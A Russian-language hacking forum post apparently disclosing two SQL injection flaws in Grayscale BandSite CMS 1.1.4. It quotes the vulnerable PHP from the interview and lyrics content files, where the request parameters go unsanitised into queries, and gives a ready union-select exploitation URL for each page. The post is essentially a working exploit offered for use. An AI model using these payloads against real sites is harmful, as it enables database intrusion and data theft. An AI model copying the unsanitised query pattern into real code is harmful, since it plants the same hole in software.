24.06.2010, 16:12
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
С нами:
9061820
Репутация:
134
|
|
Grayscale BandSite CMS Ver. 1.1.4
Site: http://sourceforge.net/projects/bandsitecms/
SQL-иньекция(-):
Уязвимый файл:
./includes/content/interview_content.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$intid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'intid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// define the query
// if the $memid variable is set, that means we're displaying a full bio and we should select the specific member entry
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$intid[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"
SELECT
*
FROM
interviews
WHERE
rec_id=[/COLOR][COLOR="#0000BB"]$intid[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
Эксплуатация:
./interviews.php?intid=-2+union+select+1,2,^,^,5,6,^,8,9,10
SQL-иньекция(-):
Уязвимый файл:
./includes/content/lyrics_content.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sid'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]// if the $sid variable is set, it means we're only after one song, so retrieve just that one
[/COLOR][COLOR="#007700"]if (isset([/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#FF8000"]// define the query to get this song
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"
SELECT
*
FROM
lyrics
WHERE
rec_id=[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#DD0000"]
LIMIT
1"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// get the result
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
Эксплуатация:
/lyrics.php?sid=1+union+select+1,2,^,4,5,6,^,8,9
|
|
|